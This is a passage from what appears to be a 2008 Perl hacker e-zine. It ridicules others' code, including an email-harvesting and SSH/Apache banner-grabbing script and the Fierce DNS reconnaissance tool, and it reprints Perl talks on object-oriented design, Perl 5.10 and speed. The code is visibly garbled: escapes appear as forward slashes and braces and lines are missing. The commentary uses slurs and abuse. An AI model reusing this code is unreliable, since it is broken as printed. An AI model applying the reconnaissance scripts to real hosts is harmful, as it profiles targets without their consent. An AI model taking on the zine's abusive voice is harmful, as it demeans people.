Perl Underground 5

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     H  H  H  H     $$$$$$$$$$$      $$$$$$$    $$$$$$$$$$$    $$$$          %%%%%    %
  X  HHHHHHHHH      $$$$$$$$$$           $$$$   $$$$$$$$$$     $$$$           %%
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    HHHHHHHHHH      $$$$          $$$$$$$$$$$   $$$$   $$$$    $$$$$$$$$$$      %%     %%%
      HHHHHHH       $$$$         $$$$$$$$$$$    $$$$    $$$$    $$$$$$$$$$$            %%%%

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  $$$$$$$$     $$$$     $$$$    $$$$$$$$$$$     $$$$$$$$$$$    $$$$      $$$$   $$$$$$$$$$$

That's five, kids.

[root@yourbox.anywhere]$ date
Sat Mar  1 18:22:16 EST 2008

[root@yourbox.anywhere]$ perl



$TOC[0x01] = rant(        Intro        => q{  What it's all about                       } );
$TOC[0x02] = school(      PHC          => q{  trix are for kids                         } );
$TOC[0x03] = school_you(  Damian       => q{  Damian on when to use OO                  } );
$TOC[0x04] = rant(        Perl_5_10    => q{  It's here!                                } );
$TOC[0x05] = school(      RS_IceShaman => q{  Web hax0rs combined their "skills"        } );
$TOC[0x06] = school_you(  nwclark      => q{  Nicolas Clark on speed, old school        } );
$TOC[0x07] = school(      n00b         => q{  The nick says it all                      } );
$TOC[0x08] = school_you(  merlyn       => q{  Batman uses Scalar::Util and List::Util   } );
$TOC[0x09] = school(      ilja         => q{  He poked his nose out again               } );
$TOC[0x0A] = school_you(  LR           => q{  Higher-Order Functions                    } );
$TOC[0x0B] = rant(        Intermission => q{  Laugh it up                               } );
$TOC[0x0C] = school(      kokanin      => q{  PU5 goes retro, have you noticed?         } );
$TOC[0x0D] = school_you(  broquaint    => q{  Closure on Closures                       } );
$TOC[0x0E] = school(      str0ke       => q{  And of course str0ke contributed a piece  } );
$TOC[0x0F] = school_you(  Abigail      => q{  Abigail's points on style                 } );
$TOC[0x10] = school(      h4cky0u      => q{  If only they could code                   } );
$TOC[0x11] = rant(        Advocacy     => q{  Perl rocks, no doubt.                     } );
$TOC[0x12] = school_you(  Roy_Johnson  => q{  Iterators and recursion                   } );
$TOC[0x13] = school(      Gumbie       => q{  Whatever makes him sleep at night         } );
$TOC[0x14] = school_you(  grinder      => q{  grinder talks about 5.10                  } );
$TOC[0x15] = rant(        Reading      => q{  Your reading list for this week           } );
$TOC[0x16] = school(      hessamx      => q{  We are critical of friend and fan         } );
$TOC[0x17] = school_you(  Ovid         => q{  Ovid's OO points                          } );
$TOC[0x18] = school(      tssci        => q{  Some noobs who provide "security"         } );
$TOC[0x19] = rant(        Outro        => q{  All good things come to an end            } );


-[0x01] # Welcome back to the show ---------------------------------------

The official theme of Perl Underground 5 is the highly-anticipated, recently-released, 
Perl 5.10. This theme is more in spirit than in quantity: we have only a couple of
articles on the topic. 

Besides that, we bring to you all the exciting Perl material that you can handle. We
have impressive collections of bad code to create lessons from, and educational pieces
by (mostly) established Perl experts. 

Let's get this party started.

-[0x02] # PHC: Had better stuff to not publish ---------------------------

# usage: narc1.txt
# this TEAM #PHRACK script will extract the email addresses 
# out of the narc*.txt files, enumerate the primary MX and NS 
# for each domain, and grab the SSHD and APACHE server version
# from each of these hosts (if possible). 
# For educational purposes only. Do not use.

# lawl this is old shit (but not past the statute of limitations)
# lets rag on old "TEAM #PHRACK"

# strict and warnings bitch
use IO::Socket;

# lawl you could just do @ARGV or die "...";
if ($#ARGV<0) {die "you didn't supply a filename/n";}
$nrq =$ARGV[0];
# or my $nrq = shift or die "...";

# this is probably the dirty way to do it, you could whitelist
# with more accuracy and ease
# look up qr// plzkthnx
$msearch = '([^":/s<>()/;]*@[^":/s<>()/;/.]*.[^":/s<>()/;]*)';

# very lame. use a lexical filehandle, specify the open method,
# don't quote the variable
open (INF, "$nrq") or die $!;

# //i is unnecessary, so is //g, and you could do this without 
# $&, let alone quoting it, and this is really the gross way to 
# do it in general
 	    if (m,$msearch,ig){push(@targets, "$&");}

close INF;

# plus you can do this while you read the file, not read it all 
# first
foreach $victim (@targets) {
        print "=====/t$victim /t=====/n";
	my ($lusr, $domn) = split(/@/, $victim);
	$smtphost = `host -tMX $domn |cut -d/" /" -f7 | head -1`;
# whats with random trailers? //e not even used here, you have
# an empty replacement! dumbfucks
	$smtphost =~  s/[/r/n]+$//ge;
        print ":: Primary MX located at $smtphost/n";
        $nshost = `host -tNS $domn |cut -d/" /" -f4 | head -1`;
# //e again? wtf?
        $nshost =~  s/[/r/n]+$//ge;
        print ":: Primary NS located at $nshost/n";
        print "/n/n";
# parens everywhere

sub sshcheq {
# I think someone is confused about where his paren is supposed to go!
	(my $sshost) = @_;
        print ":: Testing $sshost for sshd version/n";
# not a single good variable name in this script 
        $g = inet_aton($sshost); my $prot = 22;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!/n";
        if(connect(S,pack "SnA4x8",2,$prot,$g)) {
# omg this line isn't too bad
        	my @in;
	        select(S); $|=1; print "/n";
        	while(<S>){ push @in, $_;}
# @in = <S>; # lawl
# Parse while reading the file
	        select(STDOUT); close(S); 
# man this is old school..
                foreach $res (@in) {
	                if ($res =~ /SSH/) {
			chomp $res; print ":: SSHD version - $res/n";
	} else { return 0; } # coulda done this first and saved some
					# in-den-tation

# same shit different subroutine, maybe you could have made them into one
# with a pair of parameters HMM?
sub apachecheq {
        (my $whost) = @_;
        print ":: Testing $whost for Apache version/n";
        $g = inet_aton($whost); my $prot = 80;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!/n";
        if(connect(S,pack "SnA4x8",2,$prot,$g)) {
                my @in;
                select(S); $|=1; print "HEAD / HTTP/1.0/r/n/r/n";
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S);
                foreach $res (@in) {
                        if ($res =~ /ache/) {
                        chomp $res; print ":: HTTPD version - $res/n";
        } else { return 0; }

-[0x03] # Damian Conway's 10 considerations about using OO ---------------

On Saturday, June 23rd, Damian Conway had a little free-for-all workshop
that he gave at College of DuPage in Wheaton, IL. Although the whole day
was fascinating, the most useful part for me was his discussion of ``Ten
criteria for knowing when to use object-oriented design''. Apparently,
Damian was once a member of Spinal Tap, because his list goes to eleven.

Damian said that this list, in expanded form, is going to be part of the
standard Perl distribution soon.

- Design is large, or is likely to become large

- When data is aggregated into obvious structures, especially if there's a
  lot of data in each aggregate
  For instance, an IP address is not a good candidate: There's only 4 bytes
  of information related to an IP address. An immigrant going through
  customs has a lot of data related to him, such as name, country of origin,
  luggage carried, destination, etc. 

- When types of data form a natural hierarchy that lets us use inheritance.
  Inheritance is one of the most powerful feature of OO, and the ability to
  use it is a flag. 

- When operations on data varies on data type
  GIFs and JPGs might have their cropping done differently, even though
  they're both graphics. 

- When it's likely you'll have to add data types later
  OO gives you the room to expand in the future. 

- When interactions between data is best shown by operators
  Some relations are best shown by using operators, which can be overloaded.

- When implementation of components is likely to change, especially in the
  same program

- When the system design is already object-oriented

- When huge numbers of clients use your code
  If your code will be distributed to others who will use it, a standard
  interface will make maintenence and safety easier. 

- When you have a piece of data on which many different operations are
  Graphics images, for instance, might be blurred, cropped, rotated, and

- When the kinds of operations have standard names (check, process, etc)
  Objects allow you to have a DB::check, ISBN::check, Shape::check, etc
  without having conflicts between the types of check.

-[0x04] # Perl 5.10 has arrived ------------------------------------------

First, allow us to explain Perl versions, so you understand just what this
means. Note, especially, that Perl 5.10 is not Perl 5.1, it's Perl 5.10,
which comes after Perl 5.9. It's not Perl 6, it's the latest continuation
of the Perl 5 language. Perl 6 is still coming.

Major releases:

Perl 1 was released in December 1987.
Perl 2 was released in June 1988.
Perl 3 was released in October 1989.
Perl 4 was released in March 1991.
Perl 5 (excluding alpha/beta/gamma releases) was released in October 1994.

Now, at this point it might seem weird that Perl jumped four versions in 
seven years, yet in the 14 since then it has not moved on. Partially, it 
has, Perl 6 has been (roughly) specified and implemented. But it isn't
quite *here*, for various reasons. 

Secondly, jumping major versions for reasons such as publishing a book 
seems a bit silly, so they do not do it anymore. Perl 5 introduced a 
different way of versioning advances in Perl.

Thirdly, Perl is more stable and mature now, the rate of growth has slowed.

Perl 5.004 was released in May 1997.
Perl 5.005 was released in July 1998.
Perl 5.6 was released in March 2000. There was no Perl 5.2 or 5.4.
Perl 5.8 was released in July 2002.
Perl 5.10 has now been released, on December 18, 2007, 20 years to the day
after Perl 1.

That's one long story! The story is that now even decimals represent stable
releases, while odd ones (5.9) represent the working development version.
See perlhist for much more detail.

Perl 5.10 is a big deal. We have been using Perl 5.8 for six years now.

Like any other Perl release, 5.10 has brought some things that will change
how we code Perl. It also brought some things that won't do that, and some
things that we might think better of in a few years.

Here are a few of the good ones that you're likely to see.

say(). say() is like Ruby puts(), or Python print(), or Perl 6 say(), etc.
All it is is a print with a newline. It'll definitely be less of a pain in
the ass than print and a /n, and looks cleaner.

The defined-or operator. Sometimes you want to set something to a value,
like a configuration value, but also have a default. You can't always do:
my $flag = $conf{flag} || $default;, because what if $conf{flag} is
explicably set to 0? So you end up doing: my $flag = defined $conf{flag} ?
$conf{flag} : $default;. Here's the new way: my $flag = $conf{flag} //

Lexical $_. Instead of being worried about clobbering $_, we can create
a lexical version and all is good, leading to shorter syntax.

State variables. This is something we should have had a long time ago.
They are similar in concept to C static variables. Better than using a
closure (which has also improved in Perl 5.10), usually.

The notorious given statement: Perl finally has a switch statement. Kind
of. Take a look, the syntax is kind of a hassle and will make you wonder
why you aren't just using if blocks. Until you read how it uses smart
matching. The naming is smartly in-tune with the linguistic character of

Last and not least, smart matching!

Possibly the single most pressing change in Perl 5.10 is smart matching.
Smart matching is just that, you give two operands and Perl compares them
in a natural way. Gives us a whole new area to be confused in, and to
create data-dependent runtime bugs.

perlsyn has been updated, and this is the juicy bit:


The behaviour of a smart match depends on what type of thing its arguments
are. It is always commutative, i.e. $a ~~ $b behaves the same as $b ~~ $a.
The behaviour is determined by the following table: the first row that
applies, in either order, determines the match behaviour.

    $a	    $b	      Type of Match Implied    Matching Code
    ======  =====     =====================    =============
    (overloading trumps everything)

    Code[+] Code[+]   referential equality     $a == $b
    Any     Code[+]   scalar sub truth	       $b->($a)

    Hash    Hash      hash keys identical      [sort keys %$a]~~[sort keys %$b]
    Hash    Array     hash slice existence     grep {exists $a->{$_}} @$b
    Hash    Regex     hash key grep	       grep /$b/, keys %$a
    Hash    Any       hash entry existence     exists $a->{$b}

    Array   Array     arrays are identical[*]
    Array   Regex     array grep	       grep /$b/, @$a
    Array   Num       array contains number    grep $_ == $b, @$a
    Array   Any       array contains string    grep $_ eq $b, @$a

    Any     undef     undefined 	       !defined $a
    Any     Regex     pattern match	       $a =~ /$b/
    Code()  Code()    results are equal        $a->() eq $b->()
    Any     Code()    simple closure truth     $b->() # ignoring $a
    Num     numish[!] numeric equality	       $a == $b
    Any     Str       string equality	       $a eq $b
    Any     Num       numeric equality	       $a == $b

    Any     Any       string equality	       $a eq $b

 + - this must be a code reference whose prototype (if present) is not ""
     (subs with a "" prototype are dealt with by the 'Code()' entry lower
 * - that is, each element matches the element of same index in the other
     array. If a circular reference is found, we fall back to referential
 ! - either a real number, or a string that looks like a number

The "matching code" doesn't represent the real matching code, of course:
it's just there to explain the intended meaning. Unlike grep, the smart
match operator will short-circuit whenever it can.


Smart matching is one of those fancy Perl 6 features that some people
did not want backported to Perl 5. The official PU position is that when
Perl 6 comes to the show, the world will probably use it, sooner or later. 
But until then, don't hold anything back, Perl 5 is beautiful and we can 
continue to make it better.

More on Perl 5.10 at the end of the zine. If you can't wait, check out
these pieces right now. Or do it later, but either way, read them. There
is a lot more than just what we have summarized here.

-[0x05] # RSnake is RJoke, and IceShaman isn't much better ---------------


# Fierce v0.9.9 - Beta 03/24/2007
# By RSnake
# Threading and additions by IceShaman

# Finally, something with some length to it.. let's do this...

use strict; # Nice, but no warnings?
use Net::hostent;
use Net::DNS;
use IO::Socket;
use Socket;
use Getopt::Long; # props. 
# command line options
my $class_c;
my $delay = 0;
my $dns;
my $dns_file;
my $dns_server;
my @dns_servers;
my $filename;  
my $full_output;
my $help; 
my $http_connect;  
my $nopattern;	
my $range;
my $search;
my $suppress;
my $tcp_timeout;
my $threads;
my $traverse;	
my $version;   
my $wide;		
my $wordlist;		
# You know that my() can take a comma seperated list of arguments, right?

my @common_cnames;
my $count_hostnames = 0;
my @domain_ns;
my $h;
my @ip_and_hostname;
my $logging;
my %options = ();
my $res = Net::DNS::Resolver->new;
my $search_found;
my %subnets;
my %tested_names;
my $this_ip;
my $version_num = 'Version 0.9.9 - Beta 03/24/2007';
my $webservers = 0;
my $wildcard_dns;
my @wildcards;
my @zone;

my $count;
my %known_ips;
my %known_names;
my @output;
my @thread;
my $thread_support;
# Wow, nice load of variables there.

# Way to embrace the concept of lexical variables by having 40 of them be
$count = 0; # Why not set it to zero when you declare it?

# ignore all errors while trying to load up thead stuff
  $SIG{__DIE__}  = sub { };
  $SIG{__WARN__} = sub { };
# try and load thread modules, if it works import their functions
  eval {
    require threads;
    require threads::shared;
    require Thread::Queue;
    $thread_support = 1;
  if ($@) { # got errors, no ithreads  :( 
	    # awww... what a shame... there's always 505threads though
    $thread_support = 0;
  } else { #safe to haul in the threadding functions
    import threads;
    import threads::shared;
    import Thread::Queue;

# turn errors back on
  $SIG{__DIE__}  = 'DEFAULT';
  $SIG{__WARN__} = 'DEFAULT';

# OK really, why did you need three BEGIN blocks?
# Why not just use() them in the eval, because you catch failure 
# anyways?
# Do you think your signal catching is actually useful here?
# We will see more confusion as we go

my $result = GetOptions (	
			'dns=s' 	=> /$dns, 
			'file=s'	=> /$filename,
			'suppress'	=> /$suppress,
			'help'		=> /$help, 
			'connect=s'	=> /$http_connect,
			'range=s'	=> /$range,
			'wide'		=> /$wide,
			'delay=i'	=> /$delay,
			'dnsfile=s'	=> /$dns_file,
			'dnsserver=s'	=> /$dns_server,
			'version'	=> /$version,
			'search=s'	=> /$search,
			'wordlist=s'	=> /$wordlist,
			'fulloutput'	=> /$full_output,
			'nopattern'	=> /$nopattern,
			'tcptimeout=i'	=> /$tcp_timeout,
			'traverse=i'	=> /$traverse,
			'threads=i'	=> /$threads,

help()			 if $help; # excellent oneliner there
quit_early($version_num) if $version;

if (!$dns && !$range) { # Try 'not' and 'and'
  output("You have to use the -dns switch with a domain after it.");
  quit_early("Type: perl -h for help");
} elsif ($dns && $dns !~ /[a-z/d.-]/.[a-z]*/i) { # you want + not *
  output("/n/tUhm, no. /"$dns/" is gimp. A bad domain can mess up your
  quit_early("/tTry again.");

if ($filename && $filename ne '') { 
# If it has a value and if it's not equal to '' eh? 
# Does anyone else see the redundancy there?
# If it passes the first condition, it will ALWAYS pass the second
  $logging = 1;
  if (-e $filename) { # file exists
    print "File already exists, do you want to overwrite it? [Y|N] ";
    chomp(my $overwrite = <STDIN>);
    if ($overwrite eq 'y' || $overwrite eq 'Y') {
      open FILE, '>', $filename 
	or quit_early("Having trouble opening $filename anyway"); 
# nice. a 3 arg open and a good use of an 'or' !
    } else { # Your paren style sucks.
      quit_early('Okay, giving up');
  } else {
    open FILE, '>', $filename 
      or quit_early("Having trouble opening $filename");
  } # man you could have made this cleaner, could have just done a
# quit_early for a n/N and then open otherwise
  output('Now logging to ' . $filename); 

if ($http_connect) {
  unless (-e $http_connect) {
    open (HEADERS, "$http_connect") # Why'd you quote the scalar here, but
				    # not above? And don't you know about 
				    # the security risks of using open()
				    # like this
      or quit_early("Having trouble opening $http_connect");
    close HEADERS; # uh... open... and close... Are you just testing that
                   # you can? -r for that

# if user doesn't provide a number, they both end up at 0
quit_early('Your delay tag must be a positive integer')  
  if ($delay && $delay != 0 && $delay !~ /^/d*$/); # Try 'and' instead of
'&&'. Also, lose the parens.
# You still don't understand how this works: if the first condition
# passes, the second ALWAYS will.
# what you probably think is happening is this:
# if ( defined $delay && $delay != 0 && $delay !~ /^/d*$/)
# But it isn't. You're just a noob.

quit_early('Your thread tag must be a positive integer') 
  if ($threads && $threads != 0 && $threads !~ /^/d*$/);
# isn't if ($threads and not $thread_support) pretty smooth to read?
# smooth like silk
if ($threads && !$thread_support) { 
  quit_early('Perl is not configured to support ithreads');
if ($dns_file) {
  open (DNSFILE, '<', $dns_file) 
   or quit_early("Can't open $dns_file");
   for (<DNSFILE>) {
     push @dns_servers, $_; # yucky sucky
   if (@dns_servers) {
     output("Using DNS servers from $dns_file");
   } else {
     output("DNS file $dns_file is empty, using default options");

# OK these guys are just too lame to profile much more of their code
# We're gonna cut almost all of it out and just point out a few especially
# funny parts

# lol how about $tcp_timeout ||= 10; 
# or $res->tcp_timeout($tcp_timeout || 10 );
if ($tcp_timeout) {
} else {

# lawl someone meant > 255! Someone did not test his shitty code!
  quit_early('The -t flag must contain an integer 0-255') if $traverse <

# This line here makes those or's look kinda dumb, huh?
  $wordlist = $wordlist || 'hosts.txt';
  if (-e $wordlist) {
    # user provided or default
    open (WORDLIST, '<', $wordlist)   or 
    open (WORDLIST, '<', 'hosts.txt') or
    quit_early("Can't open $wordlist or the default wordlist");

# how about just ++ it? 0 + 1 = 1
  if ( $subnets{"$bytes[0].$bytes[1].$bytes[2]"} ) {
  } else {
    $subnets{"$bytes[0].$bytes[1].$bytes[2]"} = 1;

# wasted variables, didn't check if the regex matched, used * instead of +
  if ($wide) {
    ($lowest, $highest) = (0, 255);
  } else { # user provided range
    if ($octet[3] =~ /(/d*)-(/d*)/) {
      ($lowest, $highest) = ($1, $2);
      quit_early("Your range doesn't make sense, try again") 

    #TODO: add port selection and range support
    my $socket = new IO::Socket::INET ( 
					PeerAddr => "$ip_and_hostname[0]",
					PeerPort => 'http(80)',
					Timeout  => 10,
					Proto	 => 'tcp',

# It's just all very silly and stupid. To think that these guys wrote this up,
# didn't clean it, didn't even test it, and then released it to the world like
# it was big shit and they were bigger. kids, just keep your shitty code to
# yourself. Or send it to us for PU+ certification.

# RSnake needs to stick to his nice easy PHP world, where he can be a god 
# among retards. Same for IceShaman and HTS. Neither can play with grown-ups.

-[0x06] # Nicolas Clark with some (old) notes on speed -------------------

Nicholas Clark - When perl is not quite fast enough


So you have a perl script. And it's too slow. And you want to do something
about it. This is a talk about what you can do to speed it up, and also
how you try to avoid the problem in the first place.
Obvious things

Find better algorithm

Your code runs in the most efficient way that you can think of. But maybe
someone else looked at the problem from a completely different direction
and found an algorithm that is 100 times faster. Are you sure you have the
best algorithm? Do some research. 

Throw more hardware at it

If the program doesn't have to run on many machines may be cheaper to
throw more hardware at it. After all, hardware is supposed to be cheap and
programmers well paid. Perhaps you can gain performance by tuning your
hardware better; maybe compiling a custom kernel for your machine will be


For a CGI script that I wrote, I found that even after I'd shaved
everything off it that I could, the server could still only serve 2.5 per
second. The same server running the same script under mod_perl could serve
25 per second. That's a factor of 10 speedup for very little effort. And
if your script isn't suitable for running under mod_perl there's also
fastcgi (which supports). And if your script isn't a CGI, you could
look at the persistent perl daemon, package PPerl on CPAN.

Rewrite in C, er C++, sorry Java, I mean C#, oops no ...

Of course, one final "obvious" solution is to re-write your perl program
in a language that runs as native code, such as C, C++, Java, C# or
whatever is currently flavour of the month. 

But these may not be practical or politically acceptable solutions.


So you can compromise.


You may find that 95% of the time is spent in 5% of the code, doing
something that perl is not that efficient at, such as bit shifting. So you
could write that bit in C, leave the rest in perl, and glue it together
with XS. But you'd have to learn XS and the perl API, and that's a lot of


Or you could use Inline. If you have to manipulate perl's internals then
you'll still have to learn perl's API, but if all you need is to call out
from perl to your pure C code, or someone else's C library then Inline
makes it easy. 

Here's my perl script making a call to a perl function rot32. And here's a
C function rot32 that takes 2 integers, rotates the first by the second,
and returns an integer result. That's all you need! And you run it and it
    #!/usr/local/bin/perl -w
    use strict;
    printf "$_:/t%08X/t%08X/n", rot32 (0xdead, $_), rot32 (0xbeef, -$_)
      foreach (0..31);
    use Inline C => <<'EOC';
    unsigned rot32 (unsigned val, int by) {
      if (by >= 0)
	return (val >> by) | (val << (32 - by));
      return (val << -by) | (val >> (32 + by));
    0:	    0000DEAD	    0000BEEF
    1:	    80006F56	    00017DDE
    2:	    400037AB	    0002FBBC
    3:	    A0001BD5	    0005F778
    4:	    D0000DEA	    000BEEF0

Compile your own perl?

Are you running your script on the perl supplied by the OS? Compiling your
own perl could make your script go faster. For example, when perl is
compiled with threading, all its internal variables are made thread safe,
which slows them down a bit. If the perl is threaded, but you don't use
threads then you're paying that speed hit for no reason. Likewise, you may
have a better compiler than the OS used. For example, I found that with
gcc 3.2 some of my C code run 5% faster than with 2.9.5. [One of my
helpful hecklers in the audience said that he'd seen a 14% speedup, (if I
remember correctly) and if I remember correctly that was from recompiling
the perl interpreter itself]

Different perl version?

Try using a different perl version. Different releases of perl are faster
at different things. If you're using an old perl, try the latest version.
If you're running the latest version but not using the newer features, try
an older version. 

Banish the demons of stupidity

Are you using the best features of the language?


There's a Larry Wall quote - Doing linear scans over an associative array
is like trying to club someone to death with a loaded Uzi. 

I trust you're not doing that. But are you keeping your arrays nicely
sorted so that you can do a binary search? That's fast. But using a hash
should be faster.


In languages without regexps you have to write explicit code to parse
strings. perl has regexps, and re-writing with them may make things 10
times faster. Even using several with the /G anchor and the /gc flags may
still be faster. 
    if ( //G.../gc ) {
    } elsif ( //G.../gc ) {
    } elsif ( //G.../gc ) {

pack and unpack

pack and unpack have far too many features to remember. Look at the
manpage - you may be able to replace entire subroutines with just one


undef. what do I mean undef? 

Are you calculating something only to throw it away?

For example the script in the Encode module that compiles character
conversion tables would print out a warning if it saw the same character
twice. If you or I build perl we'll just let those build warnings scroll
off the screen - we don't care - we can't do anything about it. And it
turned out that keeping track of everything needed to generate those
warnings was slowing things down considerably. So I added a flag to
disable that code, and perl 5.8 defaults to use it, so it builds more


Various helpful hecklers (most of who saw the talk (and I'm
counting David Adler as part of as he's subscribed to the list))
wanted me to remind people that you really really don't want to be
optimising unless you absolutely have to. You're making your code harder
to maintain, harder to extend, and easier to introduce new bugs into.
Probably you've done something wrong to get to the point where you need to
optimise in the first place.

I agree.

Also, I'm not going to change the running order of the slides. There isn't
a good order to try to describe things in, and some of the ideas that
follow are actually more "good practice" than optimisation techniques, so
possibly ought to come before the slides on finding slowness. I'll mark
what I think are good habits to get into, and once you understand the
techniques then I'd hope that you'd use them automatically when you first
write code. That way (hopefully) your code will never be so slow that you
actually want to do some of the brute force optimising I describe here.


Must not introduce new bugs

The most important thing when you are optimising existing working code is
not to introduce new bugs.

Use your full regression tests  :-) 

For this, you can use your full suite of regression tests. You do have
one, don't you? 

[At this point the audience is supposed to laugh nervously, because I'm
betting that very few people are in this desirable situation of having
comprehensive tests written]

Keep a copy of original program

You must keep a copy of your original program. It is your last resort if
all else fails. Check it into a version control system. Make an off site
backup. Check that your backup is readable. You mustn't lose it. 
In the end, your ultimate test of whether you've not introduced new bugs
while optimising is to check that you get identical output from the
optimised version and the original. (With the optimised version taking
less time). 

What causes slowness


It's obvious that if you script hogs the CPU for 10 seconds solid, then to
make it go faster you'll need to reduce the CPU demand.


A lesser cause of slowness is memory. 
perl trades RAM for speed
One of the design decisions Larry made for perl was to trade memory for
speed, choosing algorithms that use more memory to run faster. So perl
tends to use more memory.
getting slower (relative to CPU)
CPUs keep getting faster. Memory is getting faster too. But not as
quickly. So in relative terms memory is getting slower. [Larry was correct
to choose to use more memory when he wrote perl5 over 10 years ago.
However, in the future CPU speed will continue to diverge from RAM speed,
so it might be an idea to revisit some of the CPU/RAM design trade offs in

memory like a pyramid

You can never have enough memory, and it's never fast enough.

Computer memory is like a pyramid. At the point you have the CPU and its
registers, which are very small and very fast to access. Then you have 1
or more levels of cache, which is larger, close by and fast to access.
Then you have main memory, which is quite large, but further away so
slower to access. Then at the base you have disk acting as virtual memory,
which is huge, but very slow.

Now, if your program is swapping out to disk, you'll realise, because the
OS can tell you that it only took 10 seconds of CPU, but 60 seconds
elapsed, so you know it spent 50 seconds waiting for disk and that's your
speed problem. But if your data is big enough to fit in main RAM, but
doesn't all sit in the cache, then the CPU will keep having to wait for
data from main RAM. And the OS timers I described count that in the CPU
time, so it may not be obvious that memory use is actually your problem.

This is the original code for the part of the Encode compiler (enc2xs)
that generates the warnings on duplicate characters:
    if (exists $seen{$uch}) {
	warn sprintf("U%04X is %02X%02X and %02X%02X/n",
    else {
	$seen{$uch} = [$page,$ch];

It uses the hash %seen to remember all the Unicode characters that it has
processed. The first time that it meets a character it won't be in the
hash, the exists is false, so the else block executes. It stores an
arrayref containing the code page and character number in that page.
That's three things per character, and there are a lot of characters in

If it ever sees the same Unicode character again, it prints a warning
message. The warning message is just a string, and this is the only place
that uses the data in %seen. So I changed the code - I pre-formatted that
bit of the error message, and stored a single scalar rather than the
    if (exists $seen{$uch}) {
	warn sprintf("U%04X is %02X%02X and %04X/n",
    else {
	$seen{$uch} = $page << 8 | $ch;

That reduced the memory usage by a third, and it runs more quickly.

Step by step

How do you make things faster? Well, this is something of a black art,
down to trial and error. I'll expand on aspects of these 4 points in the
next slides.

What might be slow?

You need to find things that are actually slow. It's no good wasting your
effort on things that are already fast - put it in where it will get
maximum reward.

Think of re-write

But not all slow things can be made faster, however much you swear at
them, so you can only actually speed things up if you can figure out
another way of doing the same thing that may be faster.

Try it

But it may not. Check that it's faster and that it gives the same results.

Note results

Either way, note your results - I find a comment in the code is good. It's
important if an idea didn't work, because it stops you or anyone else
going back and trying the same thing again. And it's important if a change
does work, as it stops someone else (such as yourself next month) tidying
up an important optimisation and losing you that hard won speed gain. 

By having commented out slower code near the faster code you can look back
and get ideas for other places you might optimise in the same way.

Small easy things

These are things that I would consider good practice, so you ought to be
doing them as a matter of routine.

AutoSplit and AutoLoader

If you're writing modules use the AutoSplit and AutoLoader modules to make
perl only load the parts of your module that are actually being used by a
particular script. You get two gains - you don't waste CPU at start up
loading the parts of your module that aren't used, and you don't waste the
RAM holding the the structures that perl generates when it has compiled
code. So your modules load more quickly, and use less RAM. 

One potential problem is that the way AutoLoader brings in subroutines
makes debugging confusing, which can be a problem. While developing, you
can disable AutoLoader by commenting out the __END__ statement marking the
start of your AutoLoaded subroutines. That way, they are loaded, compiled
and debugged in the normal fashion.
  # While debugging, disable AutoLoader like this:
  # __END__

Of course, to do this you'll need another 1; at the end of the AutoLoaded
section to keep use happy, and possibly another __END__.

Schwern notes that commenting out __END__ can cause surprises if the main
body of your module is running under use strict; because now your
AutoLoaded subroutines will suddenly find themselves being run under use
strict. This is arguably a bug in the current AutoSplit - when it runs at
install time to generate the files for AutoLoader to use it doesn't add
lines such as use strict; or use warnings; to ensure that the split out
subroutines are in the same environment as was current at the __END__
statement. This may be fixed in 5.10.

Elizabeth Mattijsen notes that there are different memory use versus
memory shared issues when running under mod_perl, with different optimal
solutions depending on whether your apache is forking or threaded.

=pod @ __END__

If you are documenting your code with one big block of pod, then you
probably don't want to put it at the top of the file. The perl parser is
very fast at skipping pod, but it's not magic, so it still takes a little
time. Moreover, it has to read the pod from disk in order to ignore it. 
  #!perl -w
  use strict;
  =head1 You don't want to do that
  big block of pod
  =head1 You want to do this

If you put your pod after an __END__ statement then the perl parser will
never even see it. This will save a small amount of CPU, but if you have a
lot of pod (>4K) then it might also mean that the last disk block(s) of a
file are never even read in to RAM. This may gain you some speed. [A
helpful heckler observed that modern raid systems may well be reading in
64K chunks, and modern OSes are getting good at read ahead, so not reading
a block as a result of =pod @ __END__ may actually be quite rare.]

If you are putting your pod (and tests) next to their functions' code
(which is probably a better approach anyway) then this advice is not
relevant to you.

Needless importing is slow

Exporter is written in perl. It's fast, but not instant.

Most modules are able to export lots of their functions and other symbols
into your namespace to save you typing. If you have only one argument to
use, such as
    use POSIX;		# Exports all the defaults

then POSIX will helpfully export its default list of symbols into your
namespace. If you have a list after the module name, then that is taken as
a list of symbols to export. If the list is empty, no symbols are
    use POSIX ();	# Exports nothing.

You can still use all the functions and other symbols - you just have to
use their full name, by typing POSIX:: at the front. Some people argue
that this actually makes your code clearer, as it is now obvious where
each subroutine is defined. Independent of that, it's faster:use POSIX; 
use POSIX ();
0.516s	0.355s
use Socket;	use Socket ();
0.270s	0.231s

POSIX exports a lot of symbols by default. If you tell it to export none,
it starts in 30% less time. Socket starts in 15% less time.


avoid $&

The $& variable returns the last text successfully matched in any regular
expression. It's not lexically scoped, so unlike the match variables $1
etc it isn't reset when you leave a block. This means that to be correct
perl has to keep track of it from any match, as perl has no idea when it
might be needed. As it involves taking a copy of the matched string, it's
expensive for perl to keep track of. If you never mention $&, then perl
knows it can cheat and never store it. But if you (or any module) mentions
$& anywhere then perl has to keep track of it throughout the script, which
slows things down. So it's a good idea to capture the whole match
explicitly if that's what you need. 
    $text =~ /.* rules/;
    $line = $&; 		# Now every match will copy $& - slow
    $text =~ /(.* rules)/;
    $line = $1; 		# Didn't mention $& - fast

avoid use English;

use English gives helpful long names to all the punctuation variables.
Unfortunately that includes aliasing $& to $MATCH which makes perl think
that it needs to copy every match into $&, even if you script never
actually uses it. In perl 5.8 you can say use English '-no_match_vars'; to
avoid mentioning the naughty "word", but this isn't available in earlier
versions of perl.

avoid needless captures

Are you using parentheses for capturing, or just for grouping? Capturing
involves perl copying the matched string into $1 etc, so it all you need
is grouping use a the non-capturing (?:...) instead of the capturing


If you define scalars with building blocks for your regexps, and then make
your final regexp by interpolating them, then your final regexp isn't
going to change. However, perl doesn't realise this, because it sees that
there are interpolated scalars each time it meets your regexp, and has no
idea that their contents are the same as before. If your regexp doesn't
change, then use the /o flag to tell perl, and it will never waste time
checking or recompiling it.
but don't blow it

You can use the qr// operator to pre-compile your regexps. It often is the
easiest way to write regexp components to build up more complex regexps.
Using it to build your regexps once is a good idea. But don't screw up
(like parrot's did) by telling perl to recompile the same
regexp every time you enter a subroutine: 
    sub foo {
	my $reg1 = qr/.../;
	my $reg2 = qr/... $reg1 .../;

You should pull those two regexp definitions out of the subroutine into
package variables, or file scoped lexicals.


You find what is slow by using a profiler. People often guess where they
